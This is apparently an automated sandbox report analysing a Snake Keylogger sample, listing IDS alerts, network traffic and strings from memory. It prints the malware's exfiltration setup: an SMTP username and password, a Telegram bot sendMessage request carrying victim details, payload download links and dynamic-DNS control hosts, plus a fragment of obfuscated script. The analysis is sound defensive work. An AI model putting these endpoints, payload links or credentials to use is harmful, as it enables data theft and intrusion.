.InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdiSP.ece1Lakke2resor ');$Behaviourist=$Lsblade254[0];$Swan
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T09:28:28.330088+020028033053Unknown Traffic192.168.2.749980188.114.97.3443TCP
              2024-10-10T09:28:30.919057+020028033053Unknown Traffic192.168.2.749982188.114.97.3443TCP
              2024-10-10T09:28:35.044908+020028033053Unknown Traffic192.168.2.749986188.114.97.3443TCP
              2024-10-10T09:28:38.272046+020028033053Unknown Traffic192.168.2.749990188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T09:28:25.558303+020028032742Potentially Bad Traffic192.168.2.749975132.226.8.16980TCP
              2024-10-10T09:28:27.727335+020028032742Potentially Bad Traffic192.168.2.749975132.226.8.16980TCP
              2024-10-10T09:28:29.323950+020028032742Potentially Bad Traffic192.168.2.749981132.226.8.16980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T09:28:20.277176+020028032702Potentially Bad Traffic192.168.2.749969142.250.186.142443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "hardware@esteem.com.my", "Password": "PI%m)}2pZn6r", "Host": "mail.esteem.com.my", "Port": "587", "Version": "4.4"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49969 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49974 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2
              Source: Binary string: ystem.Core.pdbFa source: powershell.exe, 00000006.00000002.1736763691.0000000008201000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0043F45Dh8_2_0043F2C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0043F45Dh8_2_0043F4AC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0043FC19h8_2_0043F961
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265E0D0Dh8_2_265E0B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265E1697h8_2_265E0B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265E2C19h8_2_265E2968
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265E31E0h8_2_265E2DC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EE501h8_2_265EE258
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EE0A9h8_2_265EDE00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EE959h8_2_265EE6B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EF209h8_2_265EEF60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EEDB1h8_2_265EEB08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EF661h8_2_265EF3B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_265E0040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EFAB9h8_2_265EF810
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265ED3A1h8_2_265ED0F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265ECF49h8_2_265ECCA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265ED7F9h8_2_265ED550
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265E31E0h8_2_265E310E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265E31E0h8_2_265E2DC2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 265EDC51h8_2_265ED9A8

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49981 -> 132.226.8.169:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49975 -> 132.226.8.169:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49969 -> 142.250.186.142:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49982 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49986 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Oct 2024 07:28:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsU
              Source: wscript.exe, 00000000.00000002.1342854505.0000020B00C1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310864022.0000020B02A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290273681.0000020B00C34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00C13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310645852.0000020B02A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1342094501.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342720790.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabTL
              Source: wscript.exe, 00000000.00000003.1342094501.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342720790.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eney
              Source: wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bb5a376bb8
              Source: powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000003.00000002.1514044704.0000026729180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cu
              Source: powershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: msiexec.exe, 00000008.00000002.2594642585.00000000239D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.00000267275E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000003.00000002.1514044704.00000267275E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbIP
              Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbIXR
              Source: powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googhZ
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Z
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download
              Source: msiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/n
              Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: msiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: msiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
